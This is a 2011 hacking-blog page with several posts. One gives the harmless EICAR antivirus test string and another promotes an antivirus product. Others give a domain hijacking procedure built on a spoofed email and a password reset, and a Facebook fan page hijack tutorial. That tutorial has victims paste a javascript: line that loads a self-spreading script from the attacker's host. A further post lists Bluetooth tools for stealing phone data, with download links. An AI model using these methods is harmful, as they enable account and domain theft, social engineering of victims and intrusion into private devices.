Welcome back ! Feel free to look around. If you like what you read, mention us in your post or link to this site. Hope to see you again

Saturday 24 December 2011

Follow Hackers Spot

You all might be knowing about the porn scam going in facebook nowadays ..!! but how to prevent yourself from these attacks ??? Yes, if u dont clickon those links you can be bt if you do so or anyone who is unknown then?? But heres a way to prevent yourself from these attack. A antivirus can protect you from this , I got on this review and found the solution.



Yeh now protect yourself from porn scam in facebook by AVG Antivirus12.

Just install it and when you get o open that you find that it is detected as a scam by AVG .Image:-
Enjoy ..!! You can download it form H
ere :

Avg Antivirus link :- Download


Keep Visiting..!!

Check Effectiveness Of Your Antivirus..!!

Follow Hackers Spot

Hello Visitors Todays i have brought a Trick for you all :- "How to Check Effectiviness of your Antivirus"...!! You can check this by just typing a script , the process is shown below. Hope you all will like it.

Process :-

1. Open a new text document, Click start menu go to run and type wordpad or notepad .


2. Type there the following code and save it as virustestfile.com X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


3. Now run Antivirus scan If your antivirus detects it as a virus then your Antivirus is working properly,
and If it doesn't detect it as a virus then your antivirus is not ..!!!
Update it to work properly..!!!

Tuesday 20 December 2011

Domain Hacking

Follow Hackers Spot


A Domain hacking is a process to transfer domain(yahoo.com) without owner permission
with help of phishing, sniffing,spoofing.
A domain hack is an unconventional domain name that combines domain levels,
especially the top-level domain (TLD), to spell out the full "name" or title of the domain,
making a kind of fun.


Domain Hacking process:
1. See who.is record of victim(xyz.com) DNS record and note down
admin email (hackersspot3@gmail.com)

2. Send spoof mail to victim admin email for password.

3. after open domain registrar(my.indialinks.com) website to access
their domain control panel (click forget password)

4. After you get a password in victim email address of victim domain.

5. Just login on domain control panel.

6. and get ECCP code and create new account on hosting company
and choose Domain transfer (all submit all details)

7. You will get all rights on this domain for lifetime.

eg Domain :- www.Google.com

Saturday 17 December 2011

H@cK FaCeBook F@N PaGe

Follow Hackers Spot






                               How to Hack Facebook Fan Page



Today I will show you how to hack a Facebook fan page.This is one of the most intresting  those who use facebook..

Now lets start the tutorial. First of all we will need to setup an exploit and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. This will be told along thistutorial .:)


Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.


1. Download the exploit from this
here

2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from
here.

3. Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.


4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)


5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:


www.yoursite.110mb/booster.js


6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook.


javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.110mb.com/booster.js“, b.body.appendChild(a); void(0)


Tip:  You can also encode this in ASCII format for more better results.

Monday 12 December 2011

List Of Bluetooth hacking Essential tools Now with Download Links..~!

Follow Hackers Spot

Learn HOw to HAck Cell Phones Using SUper Bluetoth :-
http://acena20.blogspot.com/2011/11/how-to-hack-cell-phones-using-bluetooth.html

...........................................////////////////////....................................................................

Bluetooth Hacking


Bluetooth hacking: Essential tools Now with Download Link..!!.:-

Bluetooth is one of the most rapidly growing connection technology. If you are someone who is
planning to gain better understanding of Bluetooth Security, you will need some essential tools.
This article lists down the Essential Bluetooth Hacking Tools.


1.) BlueScanner: BlueScanner searches out for Bluetooth-enabled devices. It will try to extract
as much information as possible for each newly discovered device.

DOWNLOAD

2.) BlueSniff: BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetoothenabled devices.

DOWNLOAD

3.) BTBrowser: Bluetooth Browser is a J2ME application that can browse and explore the
technical specification of surrounding Bluetooth-enabled devices. You can browse device
information and all supported profiles and service records of each device. BTBrowser works on
phones that supports JSR-82 - the Java Bluetooth specification.

DOWNLOAD

4.) BTCrawler: BTCrawler is a scanner for Windows Mobile based devices. It scans for other
devices in range and performs service query. It implements the BlueJacking and BlueSnarfing
attacks.

DOWNLOAD

5.) BlueBugger: BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set
of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those
vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other
private information.
DOWNLOAD / here

6.) CIHWB: Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework
for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like
BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft
Bluetooth stack.

DOWNLOAD

7.) Bluediving: Bluediving is a Bluetooth penetration testing suite. It implements attacks like
Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing,an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scannin mode.

DOWNLOAD

8.) Transient Bluetooth Environment Auditor: T-BEAR is a security-auditing platform for
Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and
various cracking tools.

DOWNLOAD

9.) Bluesnarfer: Bluesnarfer will download the phone-book of any mobile device vulnerable
to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled
mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without
alerting the owner, and gain access to restricted portions of the stored data.

DOWNLOAD

10.) BTcrack: BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to
reconstruct the Passkey and the Link key from captured Pairing exchanges.

DOWNLOAD

11.) Blooover II: Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable.
DOWNLOAD

12.) BlueTest: BlueTest is a Perl script designed to do data extraction from vulnerable
Bluetooth-enabled devices.

DOWNLOAD

13.) BTAudit: BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. DOWNLOAD

Learn HOw to HAck Cell Phones Using SUper Bluetoth :- here

Friends Please Share Which you Like ,..!! Founded For by reading the Comments >>Seached Lot For This All<<< SO, Please Share ..!!